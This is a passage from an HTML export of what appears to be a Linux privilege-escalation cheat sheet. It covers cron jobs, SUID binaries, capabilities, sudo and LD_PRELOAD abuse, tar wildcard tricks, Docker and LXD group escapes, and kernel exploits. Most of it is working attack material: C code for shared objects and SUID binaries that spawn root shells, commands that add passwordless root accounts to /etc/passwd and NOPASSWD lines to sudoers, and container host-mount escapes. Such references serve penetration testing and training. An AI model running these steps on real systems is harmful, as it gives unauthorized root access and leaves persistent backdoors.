...</code></pre><h2 id="bf84969b-def3-4ab1-87b7-16595e410a66" class="">Scheduled tasks</h2><h3 id="fcb00906-254d-4176-b8c3-876df04826e1" class="">Cron jobs</h3><p id="baa18812-d08b-4cce-bea6-bdd84a74d90b" class="">Check if you have access with write permission on these files. Check inside the file, to find other paths with write permissions.</p><pre id="653b240a-ef6d-4a40-ab86-8e51c1fa1b40" class="code"><code>/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d 
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/sudoers
/etc/exports
/etc/anacrontab
/var/spool/cron
/var/spool/cron/crontabs/root

crontab -l
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*</code></pre><p id="4a65265e-81f4-4e73-87d7-239a06b26d26" class="">You can use <a href="https://github.com/DominicBreuker/pspy">pspy</a> to detect a CRON job.</p><pre id="0d8fca2e-68ff-4d70-abdc-6005f7350325" class="code"><code># print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000</code></pre><h2 id="9ad88ba2-e49e-42e4-a111-c7abb8a41e00" class="">Systemd timers</h2><pre id="9dd0e0a0-99b1-4df5-bc41-c535d8f47b69" class="code"><code>systemctl list-timers --all
NEXT                          LEFT     LAST                          PASSED             UNIT                         ACTIVATES
Mon 2019-04-01 02:59:14 CEST  15h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily.timer              apt-daily.service
Mon 2019-04-01 06:20:40 CEST  19h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily-upgrade.timer      apt-daily-upgrade.service
Mon 2019-04-01 07:36:10 CEST  20h left Sat 2019-03-09 14:28:25 CET   3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

3 timers listed.</code></pre><h2 id="9afb1625-4648-4e1c-a67b-71bb36dc0d89" class="">SUID</h2><p id="b6a2d2a4-32d0-46d1-866c-9beaac1b7877" class="">SUID/Setuid stands for &quot;set user ID upon execution&quot;, it is enabled by default in every Linux distributions. If a file with this bit is ran, the uid will be changed by the owner one. If the file owner is <code>root</code>, the uid will be changed to <code>root</code> even if it was executed from user <code>bob</code>. SUID bit is represented by an <code>s</code>.</p><pre id="f1e81f95-cfb8-439a-822b-69f43ab360f8" class="code"><code>╭─swissky@lab ~  
╰─$ ls /usr/bin/sudo -alh                  
-rwsr-xr-x 1 root root 138K 23 nov.  16:04 /usr/bin/sudo</code></pre><h3 id="ba144fa2-aa3a-4ee1-af47-d9a9128fe779" class="">Find SUID binaries</h3><pre id="1bd8aadd-9f92-4a90-856f-b5bd776ecd38" class="code"><code>find / -perm -4000 -type f -exec ls -la {} 2&gt;/dev/null \;
find / -uid 0 -perm -4000 -type f 2&gt;/dev/null</code></pre><h3 id="dba073fc-d99f-4e45-8351-cf8be4eecc63" class="">Create a SUID binary</h3><pre id="f12ed3e6-7570-423d-a9f7-154972a3458d" class="code"><code>print &#x27;int main(void){\nsetresuid(0, 0, 0);\nsystem(&quot;/bin/sh&quot;);\n}&#x27; &gt; /tmp/suid.c   
gcc -o /tmp/suid /tmp/suid.c  
sudo chmod +x /tmp/suid # execute right
sudo chmod +s /tmp/suid # setuid bit</code></pre><h2 id="14185c86-1418-4d4d-81b6-50fe3cd5f9ee" class="">Capabilities</h2><h3 id="87957410-e20a-4637-a7ed-4b43ecf9870f" class="">List capabilities of binaries</h3><pre id="b8919f8f-af64-4f53-b85a-fb1b558c8ed4" class="code"><code>╭─swissky@lab ~  
╰─$ /usr/bin/getcap -r  /usr/bin
/usr/bin/fping                = cap_net_raw+ep
/usr/bin/dumpcap              = cap_dac_override,cap_net_admin,cap_net_raw+eip
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/rlogin               = cap_net_bind_service+ep
/usr/bin/ping                 = cap_net_raw+ep
/usr/bin/rsh                  = cap_net_bind_service+ep
/usr/bin/rcp                  = cap_net_bind_service+ep</code></pre><h3 id="805844e3-4dfd-48aa-bb69-93c179bc1ae2" class="">Edit capabilities</h3><pre id="c0a3b275-d337-4c7f-964d-73f4e64b0fa3" class="code"><code>/usr/bin/setcap -r /bin/ping            # remove
/usr/bin/setcap cap_net_raw+p /bin/ping # add</code></pre><h3 id="da451bd8-4748-4675-957e-582d0a485ba0" class="">Interesting capabilities</h3><p id="3aac24f0-4261-4dcb-9145-fadff5b52d61" class="">Having the capability =ep means the binary has all the capabilities.</p><pre id="8d846269-e8c0-4d68-bdc5-b3d346c9e596" class="code"><code>$ getcap openssl /usr/bin/openssl 
openssl=ep</code></pre><p id="98f5f700-190c-4a60-8887-b12ec4cf6085" class="">Alternatively the following capabilities can be used in order to upgrade your current privileges.</p><pre id="eccb3051-7d6d-4b24-ad2c-9b8d874523b0" class="code"><code>cap_dac_read_search # read anything
cap_setuid+ep # setuid</code></pre><p id="643b5650-4183-4e27-b0c7-fd5282e18b55" class="">Example of privilege escalation with <code>cap_setuid+ep</code></p><pre id="ea5afb18-e573-4180-81a8-bce1d2abff4c" class="code"><code>$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7

$ python2.7 -c &#x27;import os; os.setuid(0); os.system(&quot;/bin/sh&quot;)&#x27;
sh-5.0# id
uid=0(root) gid=1000(swissky)</code></pre><div id="d8805dd2-96a1-4990-b5ee-b4449f851f7a" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Capabilities name</th><th>Description</th></tr></thead><tbody><tr id="f3158dab-3aef-427c-a837-8b7a0d45443b"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_AUDIT_CONTROL.html">CAP_AUDIT_CONTROL</a></td><td class="cell-%Z5{">Allow to enable/disable kernel auditing</td></tr><tr id="b5cc9ba2-6942-4e66-ad54-1cc05bc005f8"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_AUDIT_WRITE.html">CAP_AUDIT_WRITE</a></td><td class="cell-%Z5{">Helps to write records to kernel auditing log</td></tr><tr id="5937aa2a-78a0-4fde-90e0-3155892eed54"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_BLOCK_SUSPEND.html">CAP_BLOCK_SUSPEND</a></td><td class="cell-%Z5{">This feature can block system suspends</td></tr><tr id="ae5aa344-e903-43af-ba26-7d55096b40b5"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_CHOWN.html">CAP_CHOWN</a></td><td class="cell-%Z5{">Allow user to make arbitrary change to files UIDs and GIDs</td></tr><tr id="4dc37350-4682-4c9d-b973-4575ce1f09f1"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_DAC_OVERRIDE.html">CAP_DAC_OVERRIDE</a></td><td class="cell-%Z5{">This helps to bypass file read, write and execute permission checks</td></tr><tr id="ef3276f1-da56-4c68-a3e1-05b09b46e44c"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_DAC_READ_SEARCH.html">CAP_DAC_READ_SEARCH</a></td><td class="cell-%Z5{">This only bypass file and directory read/execute permission checks</td></tr><tr id="7f307ec4-254f-44b6-8810-bbf9feea996d"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_FOWNER.html">CAP_FOWNER</a></td><td class="cell-%Z5{">This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file</td></tr><tr id="cb6cb241-e344-40e7-87fa-34ab15ba0fc3"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_KILL.html">CAP_KILL</a></td><td class="cell-%Z5{">Allow the sending of signals to processes belonging to others</td></tr><tr id="3b32a47e-4ba2-426e-a96c-b211113bb376"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_SETGID.html">CAP_SETGID</a></td><td class="cell-%Z5{">Allow changing of the GID</td></tr><tr id="3e98a191-2829-40bc-890c-922a47c47024"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_SETUID.html">CAP_SETUID</a></td><td class="cell-%Z5{">Allow changing of the UID</td></tr><tr id="b4dc18d7-ef31-4ae3-9ac6-2981fbc64321"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_SETPCAP.html">CAP_SETPCAP</a></td><td class="cell-%Z5{">Helps to transferring and removal of current set to any PID</td></tr><tr id="ddb0b641-0c8a-4246-9c31-bc93d7bcb23a"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_IPC_LOCK.html">CAP_IPC_LOCK</a></td><td class="cell-%Z5{">This helps to lock memory</td></tr><tr id="7f6d367a-c2eb-461b-97af-7632b7d6cb39"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_MAC_ADMIN.html">CAP_MAC_ADMIN</a></td><td class="cell-%Z5{">Allow MAC configuration or state changes</td></tr><tr id="6f13b52a-456b-43e4-a0f7-66b87eb9a097"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_NET_RAW.html">CAP_NET_RAW</a></td><td class="cell-%Z5{">Use RAW and PACKET sockets</td></tr><tr id="8047f5e3-aa63-41e0-a1fa-7afc84903720"><td class="cell-title"><a href="Linux%20Privilege%20Escalation/Untitled%20Database/CAP_NET_BIND_SERVICE.html">CAP_NET_BIND_SERVICE</a></td><td class="cell-%Z5{">SERVICE Bind a socket to internet domain privileged ports</td></tr></tbody></table></div><h2 id="e4dce75d-930a-4cab-8f9a-0c8070d813ea" class="">SUDO</h2><p id="6ec54d32-493e-445b-849c-e606e0a814f2" class="">Tool: <a href="https://github.com/TH3xACE/SUDO_KILLER">Sudo Exploitation</a></p><h3 id="f68d1e08-a64a-42c6-8a5f-816556a08591" class="">NOPASSWD</h3><p id="27808d2a-9fa3-4ee2-974e-82b2eae6d74f" class="">Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.</p><pre id="c9247269-8206-43c9-9d7b-d36a781551a9" class="code"><code>$ sudo -l

User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/vim</code></pre><p id="f4bec63a-c62e-44cf-b4b4-bd5a144abf3b" class="">In this example the user <code>demo</code> can run <code>vim</code> as <code>root</code>, it is now trivial to get a shell by adding an ssh key into the root directory or by calling <code>sh</code>.</p><pre id="d120162b-1c3a-42bc-b32f-4f773c7937c4" class="code"><code>sudo vim -c &#x27;!sh&#x27;
sudo -u root vim -c &#x27;!sh&#x27;</code></pre><h3 id="9b0f3804-ceaf-4f63-8658-9e7d42d4b989" class="">LD_PRELOAD and NOPASSWD</h3><p id="2a123269-79c0-446b-8fa4-7703883718e3" class="">If <code>LD_PRELOAD</code> is explicitly defined in the sudoers file</p><pre id="826aa612-5748-4986-8dbf-8feb20921025" class="code"><code>Defaults        env_keep += LD_PRELOAD</code></pre><p id="96d86b0b-9cea-4669-91b6-4fe0e06c9795" class="">Compile the following shared object using the C code below with <code>gcc -fPIC -shared -o shell.so shell.c -nostartfiles</code></p><pre id="5c736945-73c8-4043-a370-43e35d96bbc5" class="code"><code>#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;stdlib.h&gt;
void _init() {
	unsetenv(&quot;LD_PRELOAD&quot;);
	setgid(0);
	setuid(0);
	system(&quot;/bin/sh&quot;);
}</code></pre><p id="90d4240e-9b2d-4e6d-94d8-4a4da2fab480" class="">Execute any binary with the LD_PRELOAD to spawn a shell : <code>sudo LD_PRELOAD=&lt;full_path_to_so_file&gt; &lt;program&gt;</code>, e.g: <code>sudo LD_PRELOAD=/tmp/shell.so find</code></p><h3 id="f00008bb-4e32-4572-9df0-81c8a2ae914a" class="">Doas</h3><p id="23781498-3454-40c0-b60c-387e593163bc" class="">There are some alternatives to the <code>sudo</code> binary such as <code>doas</code> for OpenBSD, remember to check its configuration at <code>/etc/doas.conf</code></p><pre id="964bc62a-695d-4600-941a-b5fab386e258" class="code"><code>permit nopass demo as root cmd vim</code></pre><h3 id="4120397e-8205-4dd6-80cd-6c514263edd9" class="">sudo_inject</h3><p id="d6719ed3-39bc-47c2-973a-13dc3e546f71" class="">Using <a href="https://github.com/nongiach/sudo_inject">https://github.com/nongiach/sudo_inject</a></p><pre id="82eb5f5d-4476-425e-89cb-f1e94f476529" class="code"><code>$ sudo whatever
[sudo] password for user:    
# Press &lt;ctrl&gt;+c since you don&#x27;t have the password. 
# This creates an invalid sudo tokens.
$ sh exploit.sh
.... wait 1 seconds
$ sudo -i # no password required :)
# id
uid=0(root) gid=0(root) groups=0(root)</code></pre><p id="0c757c39-5f3c-4b57-94ae-5c49d24c8bb3" class="">Slides of the presentation : <a href="https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf">https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf</a></p><h2 id="d48e9ae2-4bf1-4e00-82e0-2035b72e69a1" class="">GTFOBins</h2><p id="2249bcef-bd47-468f-87c0-9a9d82856942" class=""><a href="https://gtfobins.github.io/">GTFOBins</a> is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.</p><p id="4b3fbb2a-2575-49be-b968-5804429bd2b8" class="">The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.</p><blockquote id="160d1642-59f5-4aae-a97a-c7f4375c7b27" class="">gdb -nx -ex &#x27;!sh&#x27; -ex quit sudo mysql -e &#x27;! /bin/sh&#x27; strace -o /dev/null /bin/sh sudo awk &#x27;BEGIN {system(&quot;/bin/sh&quot;)}&#x27;</blockquote><h2 id="89177459-a707-4be7-b8b7-4be5d2c60b93" class="">Wildcard</h2><p id="a289782e-9666-476c-b1d6-6b0730686713" class="">By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that&#x27;s where the wildcard comes in handy.</p><pre id="cbf0e8dc-6b6f-4d76-8a36-1bb20999efda" class="code"><code># create file for exploitation
touch -- &quot;--checkpoint=1&quot;
touch -- &quot;--checkpoint-action=exec=sh shell.sh&quot;
echo &quot;#\!/bin/bash\ncat /etc/passwd &gt; /tmp/flag\nchmod 777 /tmp/flag&quot; &gt; shell.sh

# vulnerable script
tar cf archive.tar *</code></pre><p id="3e5ea7cf-c9d1-4608-bc17-510f46df1ad4" class="">Tool: <a href="https://github.com/localh0t/wildpwn">wildpwn</a></p><h2 id="92618b38-fa5e-4210-970d-c20fd3ddaeaa" class="">Writable files</h2><p id="d2de8067-ef96-4ae8-a3d7-936f60442970" class="">List world writable files on the system.</p><pre id="ed415274-2498-4846-a4d6-b5315573493f" class="code"><code>find / -writable ! -user \`whoami\` -type f ! -path &quot;/proc/*&quot; ! -path &quot;/sys/*&quot; -exec ls -al {} \; 2&gt;/dev/null
find / -perm -2 -type f 2&gt;/dev/null
find / ! -path &quot;*/proc/*&quot; -perm -2 -type f -print 2&gt;/dev/null</code></pre><h3 id="a05e9194-5115-4e93-9398-4fc1b65d9558" class="">Writable /etc/passwd</h3><p id="6306afb9-dbdd-4073-8259-71f887d8c471" class="">First generate a password with one of the following commands.</p><pre id="263bd724-6c26-4307-a0f8-6dad1f3a3759" class="code"><code>openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c &#x27;import crypt; print crypt.crypt(&quot;hacker&quot;, &quot;$6$salt&quot;)&#x27;</code></pre><p id="943e396f-c3cb-4f56-a85f-621f6e917ca8" class="">Then add the user <code>hacker</code> and add the generated password.</p><pre id="a74cde86-5af1-44b1-866e-4f4102edd8e3" class="code"><code>hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash</code></pre><p id="82f282e1-d09c-41fa-8d2c-4cd75f16d65e" class="">E.g: <code>hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash</code></p><p id="13592cd9-0dbc-4211-8d18-b0078632372a" class="">You can now use the <code>su</code> command with <code>hacker:hacker</code></p><p id="533bd041-de53-45ba-b637-7bf27acbb3e4" class="">Alternatively you can use the following lines to add a dummy user without a password. WARNING: you might degrade the current security of the machine.</p><pre id="14d798a1-2ca9-4b5f-97af-dee6340ced72" class="code"><code>echo &#x27;dummy::0:0::/root:/bin/bash&#x27; &gt;&gt;/etc/passwd
su - dummy</code></pre><p id="33b94189-ca58-4c7a-b1a8-5a6ca48901c9" class="">NOTE: In BSD platforms <code>/etc/passwd</code> is located at <code>/etc/pwd.db</code> and <code>/etc/master.passwd</code>, also the <code>/etc/shadow</code> is renamed to <code>/etc/spwd.db</code>.</p><h3 id="b24a023c-270f-4029-81ea-402d81ef3d55" class="">Writable /etc/sudoers</h3><pre id="cc28c27d-defc-4e98-98f5-9c5144513bda" class="code"><code>echo &quot;username ALL=(ALL:ALL) ALL&quot;&gt;&gt;/etc/sudoers

# use SUDO without password
echo &quot;username ALL=(ALL) NOPASSWD: ALL&quot; &gt;&gt;/etc/sudoers
echo &quot;username ALL=NOPASSWD: /bin/bash&quot; &gt;&gt;/etc/sudoers</code></pre><h2 id="a060fe4e-ea9e-43a7-bdea-be959228b273" class="">NFS Root Squashing</h2><p id="4f4d4feb-ac0e-4cd5-a0f9-51d18643d26f" class="">When <strong>no_root_squash</strong> appears in <code>/etc/exports</code>, the folder is shareable and a remote user can mount it.</p><pre id="125dbfb6-bacc-44b1-8dc8-1b8e50dd33fa" class="code"><code># remote check the name of the folder
showmount -e 10.10.10.10

# create dir
mkdir /tmp/nfsdir  

# mount directory 
mount -t nfs 10.10.10.10:/shared /tmp/nfsdir    
cd /tmp/nfsdir

# copy wanted shell 
cp /bin/bash . 	

# set suid permission
chmod +s bash</code></pre><h2 id="baeb9a35-2c29-4a72-b22a-ef3dda31b722" class="">Shared Library</h2><h3 id="aab85704-bdfa-425a-8c99-1c0b59eded23" class="">ldconfig</h3><p id="d865eed1-c3b5-4550-bd3f-e659577845aa" class="">Identify shared libraries with <code>ldd</code></p><pre id="be35ab01-877e-458f-96a4-e6af22450a4c" class="code"><code>$ ldd /opt/binary
    linux-vdso.so.1 (0x00007ffe961cd000)
    vulnlib.so.8 =&gt; /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
    /lib64/ld-linux-x86-64.so.2 =&gt; /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)</code></pre><p id="76126d30-f18f-49b3-b95e-a9ecb20ac5e8" class="">Create a library in <code>/tmp</code> and activate the path.</p><pre id="62bf658e-ecfe-49b8-bb52-b2aba135a346" class="code"><code>gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c
echo &quot;/tmp/&quot; &gt; /etc/ld.so.conf.d/exploit.conf &amp;&amp; ldconfig -l /tmp/vulnlib.so
/opt/binary</code></pre><h3 id="62f006ff-8ba3-4410-aabc-897e143ba5dc" class="">RPATH</h3><pre id="d7873558-09ee-4fe7-b697-ee37b3286f41" class="code"><code>level15@nebula:/home/flag15$ readelf -d flag15 | egrep &quot;NEEDED|RPATH&quot;
 0x00000001 (NEEDED)                     Shared library: [libc.so.6]
 0x0000000f (RPATH)                      Library rpath: [/var/tmp/flag15]

level15@nebula:/home/flag15$ ldd ./flag15 
 linux-gate.so.1 =&gt;  (0x0068c000)
 libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x005bb000)</code></pre><p id="1b13a5df-e8eb-4d14-998d-81fc5873b841" class="">By copying the lib into <code>/var/tmp/flag15/</code> it will be used by the program in this place as specified in the <code>RPATH</code> variable.</p><pre id="45ae5538-1279-41de-9798-6b66ba916f8a" class="code"><code>level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/

level15@nebula:/home/flag15$ ldd ./flag15 
 linux-gate.so.1 =&gt;  (0x005b0000)
 libc.so.6 =&gt; /var/tmp/flag15/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x00737000)</code></pre><p id="0bff7003-111b-45e0-a44b-0274f5659f47" class="">Then create an evil library in <code>/var/tmp</code> with <code>gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6</code></p><pre id="f5c7bc74-3831-4b81-bdb4-f917eb596dc2" class="code"><code>#include&lt;stdlib.h&gt;
#define SHELL &quot;/bin/sh&quot;

int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
 char *file = SHELL;
 char *argv[] = {SHELL,0};
 setresuid(geteuid(),geteuid(), geteuid());
 execve(file,argv,0);
}</code></pre><h2 id="4e1e73e2-f5cb-42e8-87f7-7622b0ce5112" class="">Groups</h2><h3 id="beaedb53-cd2a-4309-a400-54e1f9dd7fb7" class="">Docker</h3><p id="828674b7-fec0-40fd-8832-5bb4c7947221" class="">Mount the filesystem in a bash container, allowing you to edit the <code>/etc/passwd</code> as root, then add a backdoor account <code>toor:password</code>.</p><pre id="5e24662b-95c6-47ee-b072-c54d00435e83" class="code"><code>$&gt; docker run -it --rm -v $PWD:/mnt bash
$&gt; echo &#x27;toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh&#x27; &gt;&gt; /mnt/etc/passwd</code></pre><p id="88754401-a820-4c9f-8a42-05c260877b10" class="">Almost similar but you will also see all processes running on the host and be connected to the same NICs.</p><pre id="7a8c91bd-4e8b-4344-b973-e2cc5f74fec4" class="code"><code>docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash</code></pre><p id="249f31a3-298e-46bd-89c2-cd0b661f9529" class="">Or use the following docker image from <a href="https://hub.docker.com/r/chrisfosterelli/rootplease/">chrisfosterelli</a> to spawn a root shell</p><pre id="60ec8fe7-60c7-4aba-89c9-38c574e7e19b" class="code"><code>$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
latest: Pulling from chrisfosterelli/rootplease
2de59b831a23: Pull complete 
354c3661655e: Pull complete 
91930878a2d7: Pull complete 
a3ed95caeb02: Pull complete 
489b110c54dc: Pull complete 
Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
Status: Downloaded newer image for chrisfosterelli/rootplease:latest

You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell

sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)</code></pre><p id="b97c1925-cab3-4255-a2c4-af54e9ec0f23" class="">More docker privilege escalation using the Docker Socket.</p><pre id="1e4123dc-6243-4ff2-805b-3e114e00c6ca" class="code"><code>sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh</code></pre><h3 id="e162e2bc-058e-4e1e-a3af-6420bd6e7420" class="">LXC/LXD</h3><p id="460e8651-e233-41d8-bcf7-16f6421b9c82" class="">The privesc requires to run a container with elevated privileges and mount the host filesystem inside.</p><pre id="3d1b311e-90e1-473d-b5d4-448cacdbb1ac" class="code"><code>╭─swissky@lab ~  
╰─$ id
uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel)</code></pre><p id="07c4baf9-1db5-41dd-8622-ad23c11b542e" class="">Build an Alpine image and start it using the flag <code>security.privileged=true</code>, forcing the container to interact as root with the host filesystem.</p><pre id="d9c07f41-c90d-4196-a470-a862098b12db" class="code"><code># build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
./build-alpine -a i686

# import the image
lxc image import ./alpine.tar.gz --alias myimage

# run the image
lxc init myimage mycontainer -c security.privileged=true

# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh</code></pre><p id="65748ae9-6e80-4548-a2bc-f5611a5a0ffa" class="">Alternatively <a href="https://github.com/initstring/lxd_root">https://github.com/initstring/lxd_root</a></p><h2 id="2f5e4456-d214-4d6f-8260-4b7dc1cfd73f" class="">Kernel Exploits</h2><p id="701c4e8b-f352-4447-97bc-5b8874f7ccac" class="">Precompiled exploits can be found inside these repositories, run them at your own risk !</p><ul id="7123d9fc-ae7a-4619-a053-8fef14a0a4a2" class="bulleted-list"><li><a href="https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits">bin-sploits - @offensive-security</a></li></ul><ul id="27dc0522-1bdc-4f29-b802-6dd44618429b" class="bulleted-list"><li><a href="https://github.com/lucyoa/kernel-exploits/">kernel-exploits - @lucyoa</a></li></ul><p id="bb1bf9ae-b821-4e95-8302-ad5db7cc6124" class="">The following exploits are known to work well, search for another exploits using <code>searchsploit -w linux kernel centos</code>.</p><h3 id="a02a018e-f6f3-474e-8441-c949a733b525" class="">CVE-2016-5195 (DirtyCow)</h3><p id="188b509c-2ee9-4141-a44e-f1e584ab56f7" class="">Linux Privilege Escalation - Linux Kernel ⇐ 3.19.0-73.8</p><pre id="09a529e7-a8b3-4a54-b837-0cb6ed823878" class="code"><code># make dirtycow stable
echo 0 &gt; /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c</code></pre><h3 id="d7cf41cd-4522-4da5-a6a5-5e91befa6ef5" class="">CVE-2010-3904 (RDS)</h3><p id="c02f7f35-011b-41e8-a80d-2d30adfd4d27" class="">Linux RDS Exploit - Linux Kernel ⇐ 2.6.36-rc8</p><pre id="970c28ec-7b50-448d-87e5-b4bdcb1fb81c" class="code"><code>https://www.exploit-db.com/exploits/15285/</code></pre><h3 id="03204d98-e538-4a1e-9dd6-97a075a7cf5c" class="">CVE-2010-4258 (Full Nelson)</h3><p id="fb887283-4569-4334-84b1-bbf75b2c0978" class="">Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)</p><pre id="51592c99-3eb4-4eb5-9e9e-fb863aa09d69" class="code"><code>https://www.exploit-db.com/exploits/15704/</code></pre><h3 id="ed4b44a4-2570-4af0-9e9f-31061c364f44" class="">CVE-2012-0056 (Mempodipper)</h3><p id="d16bb516-c03d-4c3d-bf5d-d0ba26bd1abe" class="">Linux Kernel 2.6.39 &lt; 3.2.2 (Gentoo / Ubuntu x86/x64)</p><pre id="68aa3035-bf8e-45c4-9b73-1cb70e97b27d" class="code"><code>https://www.exploit-db.com/exploits/18411</code></pre><h2 id="205de242-f026-4538-99ab-cf951b10fe32" class="">References</h2><ul id="50ee8d7f-bf8b-4824-96dd-b4369924fd97" class="bulleted-list"><li><a href="https://mn3m.info/posts/suid-vs-capabilities/">SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m</a></li></ul><ul id="85490127-1a0b-4d77-8895-ad7cf4c48ecd" class="bulleted-list"><li><a href="https://fosterelli.co/privilege-escalation-via-docker.html">Privilege escalation via Docker - April 22, 2015 - Chris Foster</a></li></ul><ul id="e5eb41ec-1327-4d2f-8985-dd03f0c1aeb3" class="bulleted-list"><li><a href="https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/">An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018</a></li></ul><ul id="7da015b3-ab77-40f6-b31b-8827f146e0cd" class="bulleted-list"><li><a href="https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/">Exploiting wildcards on Linux - Berislav Kucan</a></li></ul><ul id="eceedf0d-c250-496a-ae04-7ffb62c9573f" class="bulleted-list"><li><a href="http://p4pentest.in/2016/10/19/code-execution-with-tar-command/">Code Execution With Tar Command - p4pentest</a></li></ul><ul id="44648d42-f280-46db-a176-9ee7be10459a" class="bulleted-list"><li><a href="http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt">Back To The Future: Unix Wildcards Gone Wild - Leon Juranic</a></li></ul><ul id="aecb81e3-9282-4594-bdb3-c95b8b91771d" class="bulleted-list"><li><a href="https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/">HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018</a></li></ul><ul id="2af8f8ec-8ad7-4c8b-814e-22dba9c94ad3" class="bulleted-list"><li><a href="https://reboare.github.io/lxd/lxd-escape.html">Privilege Escalation via lxd - @reboare</a></li></ul><ul id="a7ab4f22-9ffe-4734-9c2c-acc5a75b7bb9" class="bulleted-list"><li><a href="https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/">Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018</a></li></ul><ul id="1fb1dea9-a525-43fc-9690-05eb5b4c381f" class="bulleted-list"><li><a href="https://github.com/nongiach/sudo_inject">Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc</a></li></ul><ul id="98be19cf-72d3-40bb-8786-f2dbd3ed716a" class="bulleted-list"><li><a href="http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html">Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates</a></li></ul><ul id="d3dde6a2-78ff-4dc3-b768-ff640878716d" class="bulleted-list"><li><a href="https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf">Local Privilege 